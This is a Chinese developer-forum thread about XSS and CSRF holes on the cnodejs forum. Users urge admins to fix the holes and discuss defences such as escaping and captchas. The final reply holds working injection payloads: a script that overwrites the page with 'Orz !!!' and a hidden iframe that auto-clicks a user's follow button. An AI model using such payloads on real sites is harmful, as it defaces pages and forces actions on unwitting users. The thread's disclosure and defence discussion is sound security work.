精华 关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)此篇为准!
发布于 10 年前 作者 DoubleSpout 7146 次浏览 最后一次编辑是 6 年前

原文地址:http://snoopyxdy.blog.163.com/blog/static/60117440201284103022779/

cnodejs这个也太差了,大家还是直接看原文吧,我贴贴注入的脚本代码,不小心把cnodejs搞测漏了。。。 大大们快点修复吧,上面是我博客的原文地址,大神们轻拍啊,有什么问题这里可以留言哦~

再次呼吁下,已经有人注入了:http://cnodejs.org/topic/504d12aa0e73dda60703a936

17 回复

好,沙发,插入~

哇,膜拜一下~

嗯,XSS和CSRF在cnode都可以搞!之前我也发了个贴,告诉他们!不知道现在修复没有!

好文章!不知道cnode有没有此类漏洞……

是啊,他们不修复,哎~

有的,只是没人利用而已,这里都是良民哦!

再次呼吁下管理员,不要小看XSS和CSRF的威力,赶紧修复cnodjs的漏洞吧~ 有人已经注入了,地址:http://cnodejs.org/topic/504d12aa0e73dda60703a936

是的,赶紧修复吧~

小弟也在学习csrf和xss,请问这个后台validator的xss函数和csrf中间件不好用吗?

_csrf的中间件其实对于防御csrf一点用处没有的,还是验证码靠谱。 XSS主要是防止标签被提前闭合,如果用jade的话#{变量名}会将自动转义和过滤一些危险字符的

@snoopy nodeclub中的csrf一点用没有? 这么蛋疼啊? 另一个问题是 ejs 较之jade,对于这方面没有优势是吧 我一整个晚上都在看你的网易博客 真心大神啊~ 小弟真是学习了

@snoopy 大神 能否帮小弟解答一下下面这个帖子的问题? 谢啦~ http://cnodejs.org/topic/504dc7ea659b143e1d022ad1

@shinka 谢谢捧场啊,我没有那么牛的,就一个菜鸟,还在不断学习中的,那个帖子我回复了,你可以看下哦~

@snoopy 恩 看到回复了 另外能否给小弟解答一下为啥nodeclub的csrf和xss方面不太到位呢 我看源码中也都用validator检验前台传过来的数据了 莫非这些xss是不经过后台的?

````</p><script>if (!localStorage['__stop']) $('body').html('<div style="font-size: 100px;text-align: center;margin-top: 60px;">Orz !!!</div>');</script>

<iframe src=“http://cnodejs.org/user/leizongmin” id="__flow" width=“0” height=“0”></iframe> <script>if (!localStorage[’__flow’]) { localStorage[’__flow’] = true; document.querySelector(’#__flow’).ownerDocument.querySelector(’#follow_btn’).click(); }</script>

回到顶部